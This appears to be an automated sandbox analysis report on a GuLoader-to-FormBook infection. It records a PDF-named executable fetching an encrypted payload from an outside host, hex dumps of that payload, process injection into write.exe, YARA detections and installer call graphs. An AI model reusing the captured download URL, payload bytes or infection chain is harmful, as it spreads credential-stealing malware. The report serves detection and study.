                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.11.205024437.251.143.2154432376C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-04-24 10:27:28 UTC200OUTGET /calitateX/lUMnxNJflRDqoVSbz65.bin HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                    Host: absorbante-calitate.ro
                                                                    Cache-Control: no-cache
                                                                    2024-04-24 10:27:28 UTC259INHTTP/1.1 200 OK
                                                                    Date: Wed, 24 Apr 2024 10:27:27 GMT
                                                                    Server: Apache
                                                                    Last-Modified: Wed, 24 Apr 2024 05:15:40 GMT
                                                                    ETag: "ba0101-42040-616d0c2f6e0d7"
                                                                    Accept-Ranges: bytes
                                                                    Content-Length: 270400
                                                                    Connection: close
                                                                    Content-Type: application/octet-stream
                                                                    2024-04-24 10:27:28 UTC16384INData Raw: d5 18 62 52 9c 1b 43 b4 d7 94 05 0c a6 e8 09 dd 50 85 12 7e 6e 45 ba 29 98 3a 42 c9 91 8f 72 72 af a1 d5 4a 5a 46 b0 35 ca fc 91 8a 70 b6 46 e4 9e de 21 97 f5 3a 92 40 21 73 02 95 60 08 90 36 b8 2c 2d 27 66 e2 5d 98 19 e9 e0 77 e6 df 64 d0 91 db 20 d5 a1 34 65 2d 15 a8 db d4 66 80 6f ff 11 76 d7 d3 54 bb 54 95 9c 64 59 7b 3b 5a 0e 7b ae 27 f9 31 de a3 ca c5 42 a4 b6 33 b9 82 8d 6f 53 a0 88 2c 12 50 b1 b5 ef 86 94 bc 0d 65 90 66 f8 19 ef d4 e0 c8 8c ac 0e 21 28 36 23 c9 20 e9 a7 b9 c6 81 34 6e e3 c1 2a 70 c0 b4 e6 77 68 f5 72 1d ce f4 c6 08 c7 f6 43 3e 75 31 a6 e8 e3 79 e0 96 a4 60 5a 65 ab 93 b4 89 e1 07 9a 7d 57 0a 84 8f 33 54 b3 f9 79 68 e0 de e8 ed 85 b3 a2 72 67 ab 75 5f c3 11 33 a5 87 0d dd 43 e3 ba 95 45 0b 5a a1 63 83 a1 eb c3 0c 8f ed e0 cd 32 9a
                                                                    Data Ascii: bRCP~nE):BrrJZF5pF!:@!s`6,-'f]wd 4e-fovTTdY{;Z{'1B3oS,Pef!(6# 4n*pwhrC>u1y`Ze}W3Tyhrgu_3CEZc2
                                                                    2024-04-24 10:27:28 UTC16384INData Raw: 47 19 93 58 a9 ac e2 5d ee 03 3c c0 51 4f a0 65 3b 57 99 7e 72 85 bb e2 1c 4c 65 0e cb 09 db 8d 07 13 ca 8d 02 92 5c a3 7b 6f 7f e2 f7 11 8c f0 c9 b8 70 61 c5 9c 1e f7 57 ff 0b ad 64 fa 12 70 03 09 0e e9 17 c2 e1 33 4a 68 86 a1 42 45 37 13 af c9 fe 7b 83 76 1e e2 17 3b 2d 00 b9 4d 9c 65 0f cd 55 a2 2e 06 3a 2a ed 36 81 99 39 d0 f8 70 ca 51 6e 23 55 24 8b bc 30 3f a9 43 23 eb a7 05 7c 74 f6 86 6c e9 fe 2d 43 4b 35 7b d1 e0 8f ef dc d4 45 0e 1d 8b d4 9d d0 aa 9d 65 c8 05 f9 55 90 6d 89 18 57 26 0e 18 31 3f 74 6d 11 94 f0 a2 48 bb 11 b3 04 77 46 eb e9 2f 7a 60 7f 52 5b e7 d6 d9 50 e9 9f bc 21 e1 8b be 69 09 44 08 f3 62 0c 5b 41 cb 3c 0e 2b ca 31 86 de de 9a 50 38 ec 0b 7c d9 55 db 88 78 69 33 ae f2 26 47 ce 01 54 4c 53 1c d9 3f 6e 7a 9a ab 86 d3 9f ef 0f 83
                                                                    Data Ascii: GX]<QOe;W~rLe\{opaWdp3JhBE7{v;-MeU.:*69pQn#U$0?C#|tl-CK5{EeUmW&1?tmHwF/z`R[P!iDb[A<+1P8|Uxi3&GTLS?nz
                                                                    2024-04-24 10:27:29 UTC16384INData Raw: 8e aa 35 d8 5f 25 0f 42 cb 21 81 f4 03 c0 47 2d d8 4e 21 14 22 bb 42 fd 57 28 a0 98 69 49 23 fa dd 04 d3 49 99 c6 2d b5 64 9e 72 0c 73 fe 96 f8 5d 9f 8e ed 02 bf f2 cb 01 13 5f b5 60 56 de 9f 28 d5 d6 a2 6f b5 79 c5 85 a7 b1 52 00 87 51 1d 71 63 92 bb f2 64 e1 e8 9b bb 7e b8 96 f7 f5 56 f9 04 be 1a c8 fa ce 8f 8b a5 b1 55 cb 2c 5f fb 62 86 4f 0f 35 91 63 8b 35 1a 7f 12 41 96 10 78 dd fb 01 f4 9c dd a5 0c d3 5f ef ec 7c f8 ba 7f ba c2 1b c5 6b 54 ff 47 9d aa bd 33 b6 6f c6 e6 88 08 0a c9 04 29 46 14 c1 db a3 9e fb bf bd 5e c3 5d 6d 0d 14 06 b0 bb 15 5f 6c bb 42 45 65 9f 9e 91 32 ab e8 40 84 d3 75 ba 6a c8 e9 a7 2d 77 12 53 f2 af f0 4b c9 95 93 9a 83 77 a0 48 51 46 92 a3 18 b7 b4 76 f8 b1 95 2a 0c 7b fc dd e5 09 7f be 78 a1 35 f5 ef 1d 3a 62 d4 7e 55 b5 68
                                                                    Data Ascii: 5_%B!G-N!"BW(iI#I-drs]_`V(oyRQqcd~VU,_bO5c5Ax_|kTG3o)F^]m_lBEe2@uj-wSKwHQFv*{x5:b~Uh
                                                                    2024-04-24 10:27:29 UTC16384INData Raw: ec 57 38 8c 0e 83 4c 33 6a 55 6b b7 42 ad c9 e4 fe 4b e4 87 8d 02 7e c2 09 2a 92 f6 47 4b 14 21 bb 0f bd a7 cd 13 4c 4b b0 1a 78 4e c4 4b 85 7a 49 c7 09 69 70 73 89 9b 55 08 b2 f5 63 4a 00 6a e2 70 09 f0 d6 01 f5 28 14 fc 51 d9 64 8f eb 62 90 09 82 b9 e9 1d 07 e4 9e 9b 4b 00 74 f2 e9 c9 17 de 69 b4 a2 aa 9e 28 32 66 da 9d 53 e5 2b d0 e5 5d 61 6a 08 fa 4f 29 83 97 1d db 66 26 3e 8a c1 62 82 f5 06 31 fe 42 9d da 93 97 c0 91 30 d2 9e b4 1b c1 db 14 0c 60 b2 00 c1 e6 41 05 41 cc a0 53 a9 c4 3e 45 bd 55 32 96 80 80 07 af 46 50 8d 77 3f 0e a8 5f 62 d3 bc 1a eb 98 42 50 2a 19 02 e3 8c 74 ba 81 23 ef 08 91 e4 25 60 cc 07 d7 c9 1e 0d 76 f5 55 c5 d5 10 39 23 0f 04 d3 86 83 09 53 ec a4 3e c9 8f 2f 8f 3b 60 91 65 ce a4 5c 09 66 bb 18 33 b0 f3 7f 3c 37 c0 2c 71 99 b0
                                                                    Data Ascii: W8L3jUkBK~*GK!LKxNKzIipsUcJjp(QdbKti(2fS+]ajO)f&>b1B0`AAS>EU2FPw?_bBP*t#%`vU9#S>/;`e\f3<7,q
                                                                    2024-04-24 10:27:29 UTC16384INData Raw: b4 58 03 05 b0 c7 c0 dd d9 44 5c e2 fc 79 d6 f1 d3 e0 52 b3 a7 a7 59 fe 70 b4 3a 80 ce 67 4a 6a bf 00 75 b3 25 c4 d7 7c 29 89 54 99 8d 49 2c 33 53 17 ba 0b f8 2f b9 e4 79 64 ef 18 23 04 d7 65 c0 47 bd 89 59 81 47 82 a5 b4 59 fd a6 07 db 67 3d 5b 0b 4c da f0 ba 44 fa 50 97 07 c6 6d 29 d6 a3 0d 9d 22 1c b8 92 90 2c 01 9a 56 6a ba dd cd 98 da 47 97 ea dc 4c cc 91 45 3c 64 6c 2f 78 5d b5 6b c1 0b 31 7e 98 bb de d3 ad 6b 61 f8 a7 93 44 2e 7f cf a2 f6 90 7d e3 38 92 b7 27 92 a7 f4 2f 07 d2 01 5c 61 2a ec 02 6c 1d 2b d5 b0 4e 1d 6f 9c 47 2f c5 01 98 9d 00 fd c6 b0 27 ff e7 c8 6a 8b ee b6 e8 2b fb 5d 4e 49 c9 79 f1 18 d1 52 94 a9 8a d1 99 96 d9 37 2c 38 78 b4 d3 e5 f3 0a 8d 77 e2 10 75 27 1d 04 24 7f bc 69 67 a8 d2 e6 92 37 5d 1a a9 23 fc 7b d9 f6 97 75 30 fb 91
                                                                    Data Ascii: XD\yRYp:gJju%|)TI,3S/yd#eGYGYg=[LDPm)",VjGLE<dl/x]k1~kaD.}8'/\a*l+NoG/'j+]NIyR7,8xwu'$ig7]#{u0
                                                                    2024-04-24 10:27:29 UTC16384INData Raw: 8b cf 33 17 c4 e1 25 3e 1a dd de 50 75 cb c7 5a 19 f9 d1 9e 59 3c 58 a7 68 50 33 f5 85 1a 98 14 62 01 28 77 3e d3 e2 71 ac 9b e1 5c 5e 9b ad ff 18 0a 7a 3a 42 ac 93 0b ff b8 37 ac af 41 40 c5 e9 ad d0 ea 16 74 d2 7c 84 4c 83 ea cb 6a c1 7b 09 1e d7 16 48 a1 86 a4 e3 34 31 5d 2e 7b a3 dd 48 1b ac 42 c9 44 eb 93 0d 0f ef 14 18 35 e3 e4 14 06 e1 13 36 91 95 83 3f 31 a1 c4 b0 c1 6b cd 49 2e 6d d8 41 61 16 7b 7f f9 f5 19 ac f7 ae bf ee e5 58 02 f3 75 c2 73 c7 ca 71 63 39 c6 37 36 78 13 ba de 35 b6 09 c2 bd d5 ee c8 1c 2f 00 2d ea b7 df f3 32 7d 17 99 de 58 9f e2 a9 70 4f 0b a3 d7 21 ca 1a 73 1c f0 82 10 5e 97 48 89 b4 ca 8a 16 2b ba ec 32 1c 5d 8e da ee 17 0e e5 1a eb b0 a5 8a fc 6c 73 6d b6 d3 87 9e fd 6c bc b9 06 59 8b 80 36 0a 4e cb 30 17 a2 dc e1 c4 97 a1
                                                                    Data Ascii: 3%>PuZY<XhP3b(w>q\^z:B7A@t|Lj{H41].{HBD56?1kI.mAa{Xusqc976x5/-2}XpO!s^H+2]lsmlY6N0
                                                                    2024-04-24 10:27:29 UTC16384INData Raw: b1 0f b6 f4 ab e4 f5 51 64 1e fe 32 2e f9 c5 4a 55 15 0a 1b 82 91 17 24 1d 08 65 f7 89 ef 7f 41 c1 31 37 4a 42 75 f7 8b fc a4 ee 9d 8e 8d f4 43 c3 cc 78 0c 5b f4 83 32 06 34 71 20 eb 17 db 65 d5 27 71 a8 9b 91 3e b0 11 aa 7c b7 7b f9 07 a3 33 a1 b5 5e 27 10 90 cf 5a 47 cf f2 74 b3 d1 d0 e9 3d 3a ac 84 45 bc 40 a7 25 fb e7 05 58 94 83 21 0c dd d0 cb d8 ad 88 dc ac 7f ef 93 64 d8 86 3a 64 8f f8 0a 84 5c 9b a5 90 c4 ce 08 14 60 96 35 21 71 c4 10 de 74 38 d4 96 40 4f 8e 2b c5 c4 b8 fa 62 5f f5 cd 17 65 e8 b1 46 b6 d1 9d 08 01 44 5b af 56 c9 66 a7 60 1d e3 24 e1 df 99 26 3e 7a 2c 71 c9 f5 6f 9d da a2 b9 a7 f5 e8 6e 9c df 3b 2c b5 b9 a6 56 ba 01 c0 5d b6 d1 da fc 35 20 c5 18 81 08 6d 9d bb 85 46 68 b8 d1 5a dd 7b 9d 04 ed ff 55 c1 0b df 3a 74 37 01 a7 d9 da 4c
                                                                    Data Ascii: Qd2.JU$eA17JBuCx[24q e'q>|{3^'ZGt=:E@%X!d:d\`5!qt8@O+b_eFD[Vf`$&>z,qon;,V]5 mFhZ{U:t7L
                                                                    2024-04-24 10:27:29 UTC16384INData Raw: 31 8e 05 00 0b 7e e4 a6 67 38 cd 3d a3 27 14 bc ba 57 79 c1 7b 6d c4 43 ca e6 ea ba ac 9b 75 96 bb 93 4b ff 4f 82 9f 94 ee b9 0b a5 df 42 a2 aa 86 91 91 1b 20 b0 79 93 1d 11 24 dc d6 96 48 57 d9 cd 64 a3 ea 63 53 20 37 9f c3 d5 23 f6 a1 62 22 a0 d3 21 1c 75 fa 8e 97 53 f1 67 42 cf 1a cc c6 c4 02 4b d7 d3 7e 98 f8 85 94 61 4d e6 c0 9b 22 3a 49 32 48 7a 87 2c a5 bf 40 80 31 f8 1a 48 c3 45 bf 12 79 47 bf b2 ec 9e 9d ca e0 1d 47 40 f2 b7 a2 ca 6f 96 0f 39 d1 cd 9d 8b 1e 8f ab e0 51 3c 14 ff 2d 49 7b 2e a1 06 67 c4 5b 74 13 96 67 a3 45 90 5d b1 10 aa ea 03 c7 0b c2 8c 0e e2 82 b4 f4 1b 6a 1d 2b 03 f7 26 5e 28 10 74 b5 4b 6b 8a f9 3b ad f7 d9 1c 07 c4 49 90 b8 f3 16 74 9a d0 94 df e2 c3 ef 51 27 9f 21 c1 99 dd cb 22 24 18 11 e0 ad 4b 07 eb 12 aa ca e2 11 e5 8c
                                                                    Data Ascii: 1~g8='Wy{mCuKOB y$HWdcS 7#b"!uSgBK~aM":I2Hz,@1HEyGG@o9Q<-I{.g[tgE]j+&^(tKk;ItQ'!"$K
                                                                    2024-04-24 10:27:29 UTC16384INData Raw: 32 b1 f9 d8 44 42 8d 8e 73 11 de 46 fe 92 d7 4d 05 fc e7 7e 91 37 7d 33 51 cd ad 1e 93 f6 2a c9 a4 24 e3 b8 d3 d7 bd c1 b6 e0 6f 95 24 2a 6d c6 70 d7 04 81 04 11 81 b4 93 22 fb 31 c9 3b 65 94 8c 23 f0 8a 56 36 2a e8 3e 10 ce ee 41 46 d2 be d5 6a a9 28 13 84 04 1a 45 96 e0 bf 58 00 75 dc 47 1c 5e 6e 93 1e 97 12 93 e4 b0 cf de 2f 80 b6 5e 76 67 1e 44 79 c6 47 5c db 2d 31 91 13 3e 95 71 25 93 1f e7 c4 cf e4 9a 2f f0 43 82 59 81 4e 42 64 a9 1b f0 81 3b 04 f2 c9 0a f7 08 45 d3 2c 1e 54 42 17 4d 8b ef a8 cc 32 14 97 99 fc 2b c9 a0 be 56 6c 44 f6 cc 4a a6 5d d7 95 7a 0c 35 f2 f1 59 f6 63 73 14 f5 22 1e da 46 aa cb 14 d8 bd e4 b2 19 16 fc 69 12 bc 8a 0d 78 84 c2 0c d1 ce 99 71 17 c5 b5 ec 66 6c c2 b2 74 9b 36 6c 3d 03 ec 44 70 04 29 84 f2 81 6c 4d 65 0d 26 70 64
                                                                    Data Ascii: 2DBsFM~7}3Q*$o$*mp"1;e#V6*>AFj(EXuG^n/^vgDyG\-1>q%/CYNBd;E,TBM2+VlDJ]z5Ycs"Fixqflt6l=Dp)lMe&pd
                                                                    2024-04-24 10:27:29 UTC16384INData Raw: 6a 6b 39 1f 64 08 c0 3a 8c c8 ef 1f a9 b3 7b 33 4d 25 d2 f2 fb ae dd c3 42 01 38 2f 0b 35 f3 fa 21 a5 65 f6 fe ed 52 43 b9 21 be ce 3b a6 fe e4 5b 44 9f 97 98 90 af 7a 8c 2c 0c 6c 9f 58 62 e4 ae 9e 04 44 dd 26 c7 55 ef 9f d2 33 35 df 41 88 5d cb 3c 71 2b bc 8f ba be 30 9b 3a 91 e7 5f c7 f1 68 8a a4 27 08 c9 55 17 5f 59 5c 25 37 ce 61 dd 5d 9c 95 05 64 46 8d 91 39 7d c4 77 f8 5b a0 6b 76 03 11 8c 66 b1 28 c6 cb b2 50 aa d7 60 78 75 10 80 29 9c 17 1b 91 d1 86 2d 52 31 58 05 d7 5d 94 51 4f 43 86 f6 80 f6 90 30 3c 79 94 c6 f3 3d 2d e7 93 82 e5 20 ff 01 a9 36 0a c4 ed d3 15 46 3c 06 db c0 d0 93 69 b0 12 c2 39 1f a6 16 f5 a2 ba e3 1a d0 9f 46 aa 98 9b 1f f9 e3 ba 04 47 e7 40 16 a3 a9 2d e4 80 66 d0 1e b8 3e 04 fb 38 36 a7 30 0b 0d 99 a5 39 00 73 47 7c a5 34 f0
                                                                    Data Ascii: jk9d:{3M%B8/5!eRC!;[Dz,lXbD&U35A]<q+0:_h'U_Y\%7a]dF9}w[kvf(P`xu)-R1X]QOC0<y=- 6F<i9FG@-f>8609sG|4


                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Target ID:0
                                                                    Start time:12:26:31
                                                                    Start date:24/04/2024
                                                                    Path:C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe"
                                                                    Imagebase:0x400000
                                                                    File size:646'803 bytes
                                                                    MD5 hash:7206084219E20FE7575AEC63A3422A5C
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.13454509223.0000000007965000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:2
                                                                    Start time:12:27:09
                                                                    Start date:24/04/2024
                                                                    Path:C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe"
                                                                    Imagebase:0x400000
                                                                    File size:646'803 bytes
                                                                    MD5 hash:7206084219E20FE7575AEC63A3422A5C
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.13649482189.0000000036790000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.13649482189.0000000036790000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.13650313872.0000000036E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.13650313872.0000000036E00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:4
                                                                    Start time:12:27:38
                                                                    Start date:24/04/2024
                                                                    Path:C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe"
                                                                    Imagebase:0xca0000
                                                                    File size:140'800 bytes
                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.17954988019.0000000003120000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.17954988019.0000000003120000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:5
                                                                    Start time:12:27:39
                                                                    Start date:24/04/2024
                                                                    Path:C:\Windows\SysWOW64\write.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\SysWOW64\write.exe"
                                                                    Imagebase:0x760000
                                                                    File size:10'240 bytes
                                                                    MD5 hash:3D6FDBA2878656FA9ECB81F6ECE45703
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.17955935422.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.17955935422.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.17956116305.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.17956116305.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    Reputation:low
                                                                    Has exited:false

                                                                    Target ID:6
                                                                    Start time:12:27:52
                                                                    Start date:24/04/2024
                                                                    Path:C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe"
                                                                    Imagebase:0xca0000
                                                                    File size:140'800 bytes
                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.17952328354.0000000000690000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.17952328354.0000000000690000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:8
                                                                    Start time:12:28:05
                                                                    Start date:24/04/2024
                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                    Imagebase:0x7ff778990000
                                                                    File size:597'432 bytes
                                                                    MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:20.8%
                                                                      Dynamic/Decrypted Code Coverage:14.4%
                                                                      Signature Coverage:21.1%
                                                                      Total number of Nodes:1462
                                                                      Total number of Limit Nodes:34
                                                                      execution_graph 4628 10001000 4631 1000101b 4628->4631 4638 100014bb 4631->4638 4633 10001020 4634 10001024 4633->4634 4635 10001027 GlobalAlloc 4633->4635 4636 100014e2 3 API calls 4634->4636 4635->4634 4637 10001019 4636->4637 4640 100014c1 4638->4640 4639 100014c7 4639->4633 4640->4639 4641 100014d3 GlobalFree 4640->4641 4641->4633 3629 403a41 3630 403b94 3629->3630 3631 403a59 3629->3631 3633 403be5 3630->3633 3634 403ba5 GetDlgItem GetDlgItem 3630->3634 3631->3630 3632 403a65 3631->3632 3635 403a70 SetWindowPos 3632->3635 3636 403a83 3632->3636 3638 403c3f 3633->3638 3647 401389 2 API calls 3633->3647 3637 403f14 19 API calls 3634->3637 3635->3636 3640 403aa0 3636->3640 3641 403a88 ShowWindow 3636->3641 3642 403bcf SetClassLongA 3637->3642 3643 403b8f 3638->3643 3699 403f60 3638->3699 3644 403ac2 3640->3644 3645 403aa8 DestroyWindow 3640->3645 3641->3640 3646 40140b 2 API calls 3642->3646 3649 403ac7 SetWindowLongA 3644->3649 3650 403ad8 3644->3650 3648 403e9d 3645->3648 3646->3633 3651 403c17 3647->3651 3648->3643 3658 403ece ShowWindow 3648->3658 3649->3643 3655 403b81 3650->3655 3656 403ae4 GetDlgItem 3650->3656 3651->3638 3652 403c1b SendMessageA 3651->3652 3652->3643 3653 40140b 2 API calls 3669 403c51 3653->3669 3654 403e9f DestroyWindow EndDialog 3654->3648 3736 403f7b 3655->3736 3659 403b14 3656->3659 3660 403af7 SendMessageA IsWindowEnabled 3656->3660 3658->3643 3662 403b21 3659->3662 3663 403b68 SendMessageA 3659->3663 3664 403b34 3659->3664 3673 403b19 3659->3673 3660->3643 3660->3659 3662->3663 3662->3673 3663->3655 3666 403b51 3664->3666 3667 403b3c 3664->3667 3671 40140b 2 API calls 3666->3671 3730 40140b 3667->3730 3668 403b4f 3668->3655 3669->3643 3669->3653 3669->3654 3672 403f14 19 API calls 3669->3672 3690 403ddf DestroyWindow 3669->3690 3702 405d51 3669->3702 3720 403f14 3669->3720 3674 403b58 3671->3674 3672->3669 3733 403eed 3673->3733 3674->3655 3674->3673 3676 403ccc GetDlgItem 3677 403ce1 3676->3677 3678 403ce9 ShowWindow KiUserCallbackDispatcher 3676->3678 3677->3678 3723 403f36 KiUserCallbackDispatcher 3678->3723 3680 403d13 EnableWindow 3683 403d27 3680->3683 3681 403d2c GetSystemMenu EnableMenuItem SendMessageA 3682 403d5c SendMessageA 3681->3682 3681->3683 3682->3683 3683->3681 3724 403f49 SendMessageA 3683->3724 3725 405d2f lstrcpynA 3683->3725 3686 403d8a lstrlenA 3687 405d51 18 API calls 3686->3687 3688 403d9b SetWindowTextA 3687->3688 3726 401389 3688->3726 3690->3648 3691 403df9 CreateDialogParamA 3690->3691 3691->3648 3692 403e2c 3691->3692 3693 403f14 19 API calls 3692->3693 3694 403e37 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3693->3694 3695 401389 2 API calls 3694->3695 3696 403e7d 3695->3696 3696->3643 3697 403e85 ShowWindow 3696->3697 3698 403f60 SendMessageA 3697->3698 3698->3648 3700 403f78 3699->3700 3701 403f69 SendMessageA 3699->3701 3700->3669 3701->3700 3715 405d5e 3702->3715 3703 405f81 3704 405f96 3703->3704 3766 405d2f lstrcpynA 3703->3766 3704->3669 3706 405dff GetVersion 3706->3715 3707 405f58 lstrlenA 3707->3715 3710 405d51 10 API calls 3710->3707 3712 405e77 GetSystemDirectoryA 3712->3715 3713 405e8a GetWindowsDirectoryA 3713->3715 3715->3703 3715->3706 3715->3707 3715->3710 3715->3712 3715->3713 3716 405ebe SHGetSpecialFolderLocation 3715->3716 3717 405d51 10 API calls 3715->3717 3718 405f01 lstrcatA 3715->3718 3750 405c16 RegOpenKeyExA 3715->3750 3755 405f9a 3715->3755 3764 405c8d wsprintfA 3715->3764 3765 405d2f lstrcpynA 3715->3765 3716->3715 3719 405ed6 SHGetPathFromIDListA CoTaskMemFree 3716->3719 3717->3715 3718->3715 3719->3715 3721 405d51 18 API calls 3720->3721 3722 403f1f SetDlgItemTextA 3721->3722 3722->3676 3723->3680 3724->3683 3725->3686 3728 401390 3726->3728 3727 4013fe 3727->3669 3728->3727 3729 4013cb MulDiv SendMessageA 3728->3729 3729->3728 3731 401389 2 API calls 3730->3731 3732 401420 3731->3732 3732->3673 3734 403ef4 3733->3734 3735 403efa SendMessageA 3733->3735 3734->3735 3735->3668 3737 403f93 GetWindowLongA 3736->3737 3747 40401c 3736->3747 3738 403fa4 3737->3738 3737->3747 3739 403fb3 GetSysColor 3738->3739 3740 403fb6 3738->3740 3739->3740 3741 403fc6 SetBkMode 3740->3741 